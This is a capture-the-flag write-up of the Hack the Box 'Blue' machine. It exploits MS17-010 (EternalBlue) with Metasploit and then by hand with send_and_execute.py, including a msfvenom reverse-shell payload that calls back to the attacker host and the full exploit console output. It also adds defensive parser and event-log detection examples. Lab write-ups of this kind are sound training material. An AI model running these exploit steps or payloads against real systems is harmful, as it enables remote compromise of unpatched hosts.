Hack the Box Blue

Arcy Caparros
8 min read · Feb 28, 2020

My write-up on HTB’s retired machine “Blue”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

There are probably many walk-throughs and write-ups about HTB’s Blue; however, this is my approach using Metasploit and manual exploitation techniques.

Reconnaissance

First, I will use nmapAutomator to automate the process of recon/enumeration.

./nmapAutomator.sh 10.10.10.40 all

Basic scan results:
PORT      STATE SERVICE      VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 56s, deviation: 1s, median: 56s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-02-12T02:16:33+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-12T02:16:36
|_ start_date: 2020-02-12T02:11:31

Vulnerability summary scan on all ports:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
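
For a defender running the same NSE scripts against their own estate, the lines that matter in the output above are the MS17-010 state, the SMB signing settings and the guest session. The following is an added example, not part of the original write-up or of nmapAutomator: a small parser that pulls those findings out of nmap's text output. The sample input is constructed from the results above, and the script-name heuristic is an assumption that holds for this output.

```python
import re

# Constructed sample, trimmed from the host-script results shown above.
SAMPLE = """\
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2017-0143
"""

# Heuristic: NSE script ids are lowercase and hyphenated; nested keys (account_used, State) are not.
SCRIPT_LINE = re.compile(r"^\|[_ ]?\s*([a-z0-9]+(?:-[a-z0-9]+)+):\s*(.*)$")

def split_scripts(text):
    """Group '|'-prefixed NSE output lines under the script that produced them."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_LINE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)]
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
    return {name: "\n".join(body) for name, body in scripts.items()}

def triage(text):
    """Return (script, issue) pairs a defender should act on."""
    findings = []
    for name, body in split_scripts(text).items():
        if name.startswith("smb-vuln-") and re.search(r"State:\s*VULNERABLE", body):
            cves = sorted(set(re.findall(r"CVE-\d{4}-\d+", body)))
            findings.append((name, "vulnerable: " + ", ".join(cves)))
        if name == "smb-security-mode":
            if re.search(r"message_signing:\s*disabled", body):
                findings.append((name, "SMBv1 message signing disabled"))
            if re.search(r"account_used:\s*guest", body):
                findings.append((name, "guest session accepted"))
        if name == "smb2-security-mode" and "not required" in body:
            findings.append((name, "SMBv2 signing not required"))
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The parser also accepts the whitespace-collapsed form in which the scan output appears on this page, because it keys on script names rather than indentation.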

Enumeration

Ports and services that needed to be enumerated further:

  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Based on our nmap scan results, the host is vulnerable to MS17-010 (CVE-2017-0143).

Let’s now search for possible exploits for MS17-010 using SearchSploit:

# searchsploit ms17-010

Exploitation

First attempt using Metasploit module windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.40 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.42:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.42:4444 -> 10.10.10.40:49160) at 2020-02-12 07:14:40 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
whoami
nt authority\system
C:\Windows\system32>

The result above shows that the shell is running as nt authority\system, i.e. with full local administrative privileges on the host.

Manual Exploitation

Try to exploit the host without using Metasploit.

Further research to manually exploit MS17-010 led me to https://github.com/helviojunior/MS17-010.git, exploits written in Python. There are several files in this repository with explanations of how the exploit works.

First, let’s use the checker.py script to find accessible named pipes on host 10.10.10.40:

python checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

After running checker.py, the target host shows that it is not patched, which is what we are looking for, but we still need to find accessible named pipes. To accomplish this, we have to modify the script to give us access to named pipes. First, let’s check whether using ‘guest’ as the username with a null password works.

After a slight modification, checker.py gave us the accessible named pipes below.

python checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Our next step is to use the send_and_execute.py exploit script and create our payload. send_and_execute.py uses the same bug as eternalromance and eternalsynergy; however, access to a named pipe is still needed.

Based on the results we obtained from running checker.py, a slight modification is needed in send_and_execute.py.

Once modified, proceed to create the payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe

Description of the syntax and switches used to create ms17-010.exe:

The -a flag specifies the architecture (x86 in the command above).

The --platform option sets the platform as Windows.

The -p flag specifies the payload.

LHOST is our local machine to connect back to.

LPORT is the local port to connect to.

The -e flag specifies the encoder to use (none was specified in the command above).

The -f flag sets the format.

The -o flag specifies the output file.

EXITFUNC=thread runs the shellcode in a sub-thread; exiting that thread leaves the application/system working (a clean exit).

Finally, in another terminal window, set up a netcat listener on port 443 and send the payload to the host using send_and_execute.py:

python send_and_execute.py 10.10.10.40 ms17-010.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001cbd410
SESSION: 0xfffff8a001f0e820
FLINK: 0xfffff8a0029a9088
InParam: 0xfffff8a00929f15c
MID: 0x1306
unexpected alignment, diff: 0x-68f6f78
leak failed... try again
CONNECTION: 0xfffffa8001cbd410
SESSION: 0xfffff8a001f0e820
FLINK: 0xfffff8a0092b1088
InParam: 0xfffff8a0092ab15c
MID: 0x140b
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file L8W5CO.exe...
Opening SVCManager on 10.10.10.40.....
Creating service Esyf.....
Starting service Esyf.....
The NETBIOS connection with the remote host timed out.
Removing service Esyf.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of c:\Users\haris\Desktop
24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes free
c:\Users\haris>dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes free
c:\Users\haris>
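
Seen from the defender's side, the send_and_execute.py output above describes a recognisable sequence: a file is uploaded, a randomly named service is created for it, the start times out because the file is not a real service, and the service is removed. The following added example (not from the original write-up or from the exploit's repository) correlates Service Control Manager event 7045 (service installed) with 7000/7009 (start failed or timed out) in the Windows System log. The records are constructed, and the drop path and the 90-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed System-log records (Service Control Manager); not captured from the target.
# "Esyf" and "L8W5CO.exe" mirror the output above; the C:\ drop path is an assumption.
EVENTS = [
    {"time": "2020-02-12T12:30:01", "id": 7045, "service": "Esyf",
     "image": r"C:\L8W5CO.exe"},
    {"time": "2020-02-12T12:30:31", "id": 7009, "service": "Esyf"},
    {"time": "2020-02-12T12:30:31", "id": 7000, "service": "Esyf"},
    {"time": "2020-02-12T12:40:00", "id": 7045, "service": "BackupAgent",
     "image": r"C:\Program Files\Backup\agent.exe"},
    {"time": "2020-02-12T12:41:00", "id": 7045, "service": "Qzpl",
     "image": r"C:\Users\Public\upd.exe"},
]

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
START_FAILURE_IDS = {7000, 7009}   # failed to start / timed out waiting to connect
WINDOW = timedelta(seconds=90)     # assumed correlation window

def suspicious_installs(events):
    """Return (service, image, start_failed) for service installs outside trusted dirs."""
    parsed = [dict(e, time=datetime.fromisoformat(e["time"])) for e in events]
    alerts = []
    for ev in parsed:
        if ev["id"] != 7045:
            continue
        image = ev["image"].strip('"').lower()
        if image.startswith(TRUSTED_DIRS):
            continue
        failed = any(
            o["id"] in START_FAILURE_IDS and o["service"] == ev["service"]
            and timedelta(0) <= o["time"] - ev["time"] <= WINDOW
            for o in parsed)
        alerts.append((ev["service"], ev["image"], failed))
    return alerts

if __name__ == "__main__":
    for service, image, failed in suspicious_installs(EVENTS):
        print(service, image, "start failed" if failed else "installed")
```

An install outside the trusted directories that is followed by a start failure is the higher-confidence alert; the install alone is still worth reviewing.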

VirusTotal

VT’s detection rate for the ms17-010.exe payload that we created and used to exploit the host:

https://www.virustotal.com/gui/file/f24cc582b0697f19fe5f24262aa7a28292a20a5995069bef91d695892abef1b8/detection

Lessons Learned

  • During the enumeration phase, understand not only the ports and services but also the system architecture.
  • Metasploit is convenient and very powerful, but those of us preparing for OSCP have to learn to work without it.
  • As always, keep your systems up-to-date on patches.

References:

  1. https://www.hacking-tutorial.com/tips-and-trick/what-is-metasploit-exitfunc/
  2. https://www.offensive-security.com/metasploit-unleashed/msfvenom/
  3. https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
  4. https://github.com/21y4d/nmapAutomator
